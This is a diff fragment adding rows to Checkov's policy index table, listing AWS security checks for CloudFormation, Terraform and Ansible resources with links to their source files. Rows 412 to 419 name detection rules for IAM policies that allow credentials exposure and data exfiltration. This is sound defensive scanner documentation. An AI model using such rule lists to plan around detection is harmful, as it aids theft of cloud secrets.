+|  326 | CKV_AWS_76               | resource                         | AWS::ApiGateway::Stage                                                                           | Ensure API Gateway has Access Logging enabled                                                                                                                                                            | Cloudformation          | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py)                                                                            |
+|  327 | CKV_AWS_76               | resource                         | AWS::Serverless::Api                                                                             | Ensure API Gateway has Access Logging enabled                                                                                                                                                            | Cloudformation          | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py)                                                                            |
+|  328 | CKV_AWS_76               | resource                         | aws_api_gateway_stage                                                                            | Ensure API Gateway has Access Logging enabled                                                                                                                                                            | Terraform               | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py)                                                                                 |
+|  329 | CKV_AWS_76               | resource                         | aws_apigatewayv2_stage                                                                           | Ensure API Gateway has Access Logging enabled                                                                                                                                                            | Terraform               | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py)                                                                                 |
+|  330 | CKV_AWS_77               | resource                         | aws_athena_database                                                                              | Ensure Athena Database is encrypted at rest (default is unencrypted)                                                                                                                                     | Terraform               | [AthenaDatabaseEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py)                                                                               |
+|  331 | CKV_AWS_78               | resource                         | AWS::CodeBuild::Project                                                                          | Ensure that CodeBuild Project encryption is not disabled                                                                                                                                                 | Cloudformation          | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CodeBuildProjectEncryption.py)                                                                      |
+|  332 | CKV_AWS_78               | resource                         | aws_codebuild_project                                                                            | Ensure that CodeBuild Project encryption is not disabled                                                                                                                                                 | Terraform               | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py)                                                                           |
+|  333 | CKV_AWS_79               | resource                         | AWS::EC2::LaunchTemplate                                                                         | Ensure Instance Metadata Service Version 1 is not enabled                                                                                                                                                | Cloudformation          | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IMDSv1Disabled.py)                                                                                              |
+|  334 | CKV_AWS_79               | resource                         | aws_instance                                                                                     | Ensure Instance Metadata Service Version 1 is not enabled                                                                                                                                                | Terraform               | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py)                                                                                                   |
+|  335 | CKV_AWS_79               | resource                         | aws_launch_configuration                                                                         | Ensure Instance Metadata Service Version 1 is not enabled                                                                                                                                                | Terraform               | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py)                                                                                                   |
+|  336 | CKV_AWS_79               | resource                         | aws_launch_template                                                                              | Ensure Instance Metadata Service Version 1 is not enabled                                                                                                                                                | Terraform               | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py)                                                                                                   |
+|  337 | CKV_AWS_80               | resource                         | AWS::MSK::Cluster                                                                                | Ensure MSK Cluster logging is enabled                                                                                                                                                                    | Cloudformation          | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterLogging.py)                                                                                        |
+|  338 | CKV_AWS_80               | resource                         | aws_msk_cluster                                                                                  | Ensure MSK Cluster logging is enabled                                                                                                                                                                    | Terraform               | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterLogging.py)                                                                                             |
+|  339 | CKV_AWS_81               | resource                         | AWS::MSK::Cluster                                                                                | Ensure MSK Cluster encryption in rest and transit is enabled                                                                                                                                             | Cloudformation          | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterEncryption.py)                                                                                  |
+|  340 | CKV_AWS_81               | resource                         | aws_msk_cluster                                                                                  | Ensure MSK Cluster encryption in rest and transit is enabled                                                                                                                                             | Terraform               | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py)                                                                                       |
+|  341 | CKV_AWS_82               | resource                         | AWS::Athena::WorkGroup                                                                           | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption                                                                                                              | Cloudformation          | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AthenaWorkgroupConfiguration.py)                                                                  |
+|  342 | CKV_AWS_82               | resource                         | aws_athena_workgroup                                                                             | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption                                                                                                              | Terraform               | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py)                                                                       |
+|  343 | CKV_AWS_83               | resource                         | AWS::Elasticsearch::Domain                                                                       | Ensure Elasticsearch Domain enforces HTTPS                                                                                                                                                               | Cloudformation          | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py)                                                            |
+|  344 | CKV_AWS_83               | resource                         | aws_elasticsearch_domain                                                                         | Ensure Elasticsearch Domain enforces HTTPS                                                                                                                                                               | Terraform               | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py)                                                                 |
+|  345 | CKV_AWS_83               | resource                         | aws_opensearch_domain                                                                            | Ensure Elasticsearch Domain enforces HTTPS                                                                                                                                                               | Terraform               | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py)                                                                 |
+|  346 | CKV_AWS_84               | resource                         | AWS::Elasticsearch::Domain                                                                       | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Cloudformation          | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py)                                                                      |
+|  347 | CKV_AWS_84               | resource                         | AWS::OpenSearchService::Domain                                                                   | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Cloudformation          | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py)                                                                      |
+|  348 | CKV_AWS_84               | resource                         | aws_elasticsearch_domain                                                                         | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Terraform               | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py)                                                                           |
+|  349 | CKV_AWS_84               | resource                         | aws_opensearch_domain                                                                            | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Terraform               | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py)                                                                           |
+|  350 | CKV_AWS_85               | resource                         | AWS::DocDB::DBCluster                                                                            | Ensure DocumentDB Logging is enabled                                                                                                                                                                     | Cloudformation          | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBLogging.py)                                                                                                  |
+|  351 | CKV_AWS_85               | resource                         | aws_docdb_cluster                                                                                | Ensure DocumentDB Logging is enabled                                                                                                                                                                     | Terraform               | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBLogging.py)                                                                                                       |
+|  352 | CKV_AWS_86               | resource                         | AWS::CloudFront::Distribution                                                                    | Ensure CloudFront Distribution has Access Logging enabled                                                                                                                                                | Cloudformation          | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionLogging.py)                                                                |
+|  353 | CKV_AWS_86               | resource                         | aws_cloudfront_distribution                                                                      | Ensure CloudFront distribution has Access Logging enabled                                                                                                                                                | Terraform               | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py)                                                                     |
+|  354 | CKV_AWS_87               | resource                         | AWS::Redshift::Cluster                                                                           | Redshift cluster should not be publicly accessible                                                                                                                                                       | Cloudformation          | [RedshiftClusterPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterPubliclyAccessible.py)                                                        |
+|  355 | CKV_AWS_87               | resource                         | aws_redshift_cluster                                                                             | Redshift cluster should not be publicly accessible                                                                                                                                                       | Terraform               | [RedshitClusterPubliclyAvailable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py)                                                                 |
+|  356 | CKV_AWS_88               | resource                         | AWS::EC2::Instance                                                                               | EC2 instance should not have public IP.                                                                                                                                                                  | Cloudformation          | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py)                                                                                                    |
+|  357 | CKV_AWS_88               | resource                         | AWS::EC2::LaunchTemplate                                                                         | EC2 instance should not have public IP.                                                                                                                                                                  | Cloudformation          | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py)                                                                                                    |
+|  358 | CKV_AWS_88               | resource                         | [?"amazon.aws.ec2_instance" != null][]                                                           | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                               |
+|  359 | CKV_AWS_88               | resource                         | [?"ec2_instance" != null][]                                                                      | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                               |
+|  360 | CKV_AWS_88               | resource                         | [].block[?"amazon.aws.ec2_instance" != null][]                                                   | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                               |
+|  361 | CKV_AWS_88               | resource                         | [].block[?"ec2_instance" != null][]                                                              | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                               |
+|  362 | CKV_AWS_88               | resource                         | [].block[].block[?"amazon.aws.ec2_instance" != null][]                                           | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                               |
+|  363 | CKV_AWS_88               | resource                         | [].block[].block[?"ec2_instance" != null][]                                                      | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                               |
+|  364 | CKV_AWS_88               | resource                         | [].block[].block[].block[?"amazon.aws.ec2_instance" != null][]                                   | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                               |
+|  365 | CKV_AWS_88               | resource                         | [].block[].block[].block[?"ec2_instance" != null][]                                              | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                               |
+|  366 | CKV_AWS_88               | resource                         | [].tasks[?"amazon.aws.ec2_instance" != null][]                                                   | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                               |
+|  367 | CKV_AWS_88               | resource                         | [].tasks[?"ec2_instance" != null][]                                                              | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                               |
+|  368 | CKV_AWS_88               | resource                         | [].tasks[].block[?"amazon.aws.ec2_instance" != null][]                                           | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                               |
+|  369 | CKV_AWS_88               | resource                         | [].tasks[].block[?"ec2_instance" != null][]                                                      | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                               |
+|  370 | CKV_AWS_88               | resource                         | [].tasks[].block[].block[?"amazon.aws.ec2_instance" != null][]                                   | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                               |
+|  371 | CKV_AWS_88               | resource                         | [].tasks[].block[].block[?"ec2_instance" != null][]                                              | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                               |
+|  372 | CKV_AWS_88               | resource                         | [].tasks[].block[].block[].block[?"amazon.aws.ec2_instance" != null][]                           | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                               |
+|  373 | CKV_AWS_88               | resource                         | [].tasks[].block[].block[].block[?"ec2_instance" != null][]                                      | EC2 instance should not have public IP.                                                                                                                                                                  | Ansible                 | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2PublicIP.py)                                                                                                               |
+|  374 | CKV_AWS_88               | resource                         | aws_instance                                                                                     | EC2 instance should not have public IP.                                                                                                                                                                  | Terraform               | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py)                                                                                                         |
+|  375 | CKV_AWS_88               | resource                         | aws_launch_template                                                                              | EC2 instance should not have public IP.                                                                                                                                                                  | Terraform               | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py)                                                                                                         |
+|  376 | CKV_AWS_89               | resource                         | AWS::DMS::ReplicationInstance                                                                    | DMS replication instance should not be publicly accessible                                                                                                                                               | Cloudformation          | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py)                                          |
+|  377 | CKV_AWS_89               | resource                         | aws_dms_replication_instance                                                                     | DMS replication instance should not be publicly accessible                                                                                                                                               | Terraform               | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py)                                               |
+|  378 | CKV_AWS_90               | resource                         | AWS::DocDB::DBClusterParameterGroup                                                              | Ensure DocumentDB TLS is not disabled                                                                                                                                                                    | Cloudformation          | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBTLS.py)                                                                                                          |
+|  379 | CKV_AWS_90               | resource                         | aws_docdb_cluster_parameter_group                                                                | Ensure DocumentDB TLS is not disabled                                                                                                                                                                    | Terraform               | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBTLS.py)                                                                                                               |
+|  380 | CKV_AWS_91               | resource                         | AWS::ElasticLoadBalancingV2::LoadBalancer                                                        | Ensure the ELBv2 (Application/Network) has access logging enabled                                                                                                                                        | Cloudformation          | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBv2AccessLogs.py)                                                                                            |
+|  381 | CKV_AWS_91               | resource                         | aws_alb                                                                                          | Ensure the ELBv2 (Application/Network) has access logging enabled                                                                                                                                        | Terraform               | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py)                                                                                                 |
+|  382 | CKV_AWS_91               | resource                         | aws_lb                                                                                           | Ensure the ELBv2 (Application/Network) has access logging enabled                                                                                                                                        | Terraform               | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py)                                                                                                 |
+|  383 | CKV_AWS_92               | resource                         | AWS::ElasticLoadBalancing::LoadBalancer                                                          | Ensure the ELB has access logging enabled                                                                                                                                                                | Cloudformation          | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py)                                                                                                |
+|  384 | CKV_AWS_92               | resource                         | aws_elb                                                                                          | Ensure the ELB has access logging enabled                                                                                                                                                                | Terraform               | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBAccessLogs.py)                                                                                                     |
+|  385 | CKV_AWS_93               | resource                         | aws_s3_bucket                                                                                    | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes)                                                                                                | Terraform               | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py)                                                                     |
+|  386 | CKV_AWS_93               | resource                         | aws_s3_bucket_policy                                                                             | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes)                                                                                                | Terraform               | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py)                                                                     |
+|  387 | CKV_AWS_94               | resource                         | AWS::Glue::DataCatalogEncryptionSettings                                                         | Ensure Glue Data Catalog Encryption is enabled                                                                                                                                                           | Cloudformation          | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py)                                                                        |
+|  388 | CKV_AWS_94               | resource                         | aws_glue_data_catalog_encryption_settings                                                        | Ensure Glue Data Catalog Encryption is enabled                                                                                                                                                           | Terraform               | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueDataCatalogEncryption.py)                                                                             |
+|  389 | CKV_AWS_95               | resource                         | AWS::ApiGatewayV2::Stage                                                                         | Ensure API Gateway V2 has Access Logging enabled                                                                                                                                                         | Cloudformation          | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py)                                                                        |
+|  390 | CKV_AWS_95               | resource                         | AWS::Serverless::HttpApi                                                                         | Ensure API Gateway V2 has Access Logging enabled                                                                                                                                                         | Cloudformation          | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py)                                                                        |
+|  391 | CKV_AWS_96               | resource                         | AWS::RDS::DBCluster                                                                              | Ensure all data stored in Aurora is securely encrypted at rest                                                                                                                                           | Cloudformation          | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AuroraEncryption.py)                                                                                          |
+|  392 | CKV_AWS_96               | resource                         | aws_rds_cluster                                                                                  | Ensure all data stored in Aurora is securely encrypted at rest                                                                                                                                           | Terraform               | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AuroraEncryption.py)                                                                                               |
+|  393 | CKV_AWS_97               | resource                         | AWS::ECS::TaskDefinition                                                                         | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions                                                                                                                          | Cloudformation          | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py)                                                  |
+|  394 | CKV_AWS_97               | resource                         | aws_ecs_task_definition                                                                          | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions                                                                                                                          | Terraform               | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py)                                                       |
+|  395 | CKV_AWS_98               | resource                         | aws_sagemaker_endpoint_configuration                                                             | Ensure all data stored in the Sagemaker Endpoint is securely encrypted at rest                                                                                                                           | Terraform               | [SagemakerEndpointConfigurationEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py)                                               |
+|  396 | CKV_AWS_99               | resource                         | AWS::Glue::SecurityConfiguration                                                                 | Ensure Glue Security Configuration Encryption is enabled                                                                                                                                                 | Cloudformation          | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py)                                                                        |
+|  397 | CKV_AWS_99               | resource                         | aws_glue_security_configuration                                                                  | Ensure Glue Security Configuration Encryption is enabled                                                                                                                                                 | Terraform               | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfiguration.py)                                                                             |
+|  398 | CKV_AWS_100              | resource                         | AWS::EKS::Nodegroup                                                                              | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0                                                                                                                               | Cloudformation          | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSNodeGroupRemoteAccess.py)                                                                          |
+|  399 | CKV_AWS_100              | resource                         | aws_eks_node_group                                                                               | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0                                                                                                                               | Terraform               | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSNodeGroupRemoteAccess.py)                                                                               |
+|  400 | CKV_AWS_101              | resource                         | AWS::Neptune::DBCluster                                                                          | Ensure Neptune logging is enabled                                                                                                                                                                        | Cloudformation          | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterLogging.py)                                                                                |
+|  401 | CKV_AWS_101              | resource                         | aws_neptune_cluster                                                                              | Ensure Neptune logging is enabled                                                                                                                                                                        | Terraform               | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py)                                                                                     |
+|  402 | CKV_AWS_102              | resource                         | aws_neptune_cluster_instance                                                                     | Ensure Neptune Cluster instance is not publicly available                                                                                                                                                | Terraform               | [NeptuneClusterInstancePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py)                                                                       |
+|  403 | CKV_AWS_103              | resource                         | AWS::ElasticLoadBalancingV2::Listener                                                            | Ensure that Load Balancer Listener is using at least TLS v1.2                                                                                                                                            | Cloudformation          | [ALBListenerTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py)                                                                                          |
+|  404 | CKV_AWS_103              | resource                         | aws_alb_listener                                                                                 | Ensure that load balancer is using at least TLS 1.2                                                                                                                                                      | Terraform               | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml)                                                                               |
+|  405 | CKV_AWS_103              | resource                         | aws_lb                                                                                           | Ensure that load balancer is using at least TLS 1.2                                                                                                                                                      | Terraform               | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml)                                                                               |
+|  406 | CKV_AWS_103              | resource                         | aws_lb_listener                                                                                  | Ensure that load balancer is using at least TLS 1.2                                                                                                                                                      | Terraform               | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml)                                                                               |
+|  407 | CKV_AWS_104              | resource                         | AWS::DocDB::DBClusterParameterGroup                                                              | Ensure DocumentDB has audit logs enabled                                                                                                                                                                 | Cloudformation          | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py)                                                                                              |
+|  408 | CKV_AWS_104              | resource                         | aws_docdb_cluster_parameter_group                                                                | Ensure DocumentDB has audit logs enabled                                                                                                                                                                 | Terraform               | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py)                                                                                                   |
+|  409 | CKV_AWS_105              | resource                         | AWS::Redshift::ClusterParameterGroup                                                             | Ensure Redshift uses SSL                                                                                                                                                                                 | Cloudformation          | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedShiftSSL.py)                                                                                                    |
+|  410 | CKV_AWS_105              | resource                         | aws_redshift_parameter_group                                                                     | Ensure Redshift uses SSL                                                                                                                                                                                 | Terraform               | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedShiftSSL.py)                                                                                                         |
+|  411 | CKV_AWS_106              | resource                         | aws_ebs_encryption_by_default                                                                    | Ensure EBS default encryption is enabled                                                                                                                                                                 | Terraform               | [EBSDefaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py)                                                                                       |
+|  412 | CKV_AWS_107              | resource                         | AWS::IAM::Group                                                                                  | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation          | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                              |
+|  413 | CKV_AWS_107              | resource                         | AWS::IAM::ManagedPolicy                                                                          | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation          | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                              |
+|  414 | CKV_AWS_107              | resource                         | AWS::IAM::Policy                                                                                 | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation          | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                              |
+|  415 | CKV_AWS_107              | resource                         | AWS::IAM::Role                                                                                   | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation          | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                              |
+|  416 | CKV_AWS_107              | resource                         | AWS::IAM::User                                                                                   | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation          | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                              |
+|  417 | CKV_AWS_107              | data                             | aws_iam_policy_document                                                                          | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform               | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py)                                                                                       |
+|  418 | CKV_AWS_108              | resource                         | AWS::IAM::Group                                                                                  | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation          | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                                    |
+|  419 | CKV_AWS_108              | resource                         | AWS::IAM::ManagedPolicy                                                                          | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation          | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                                    |
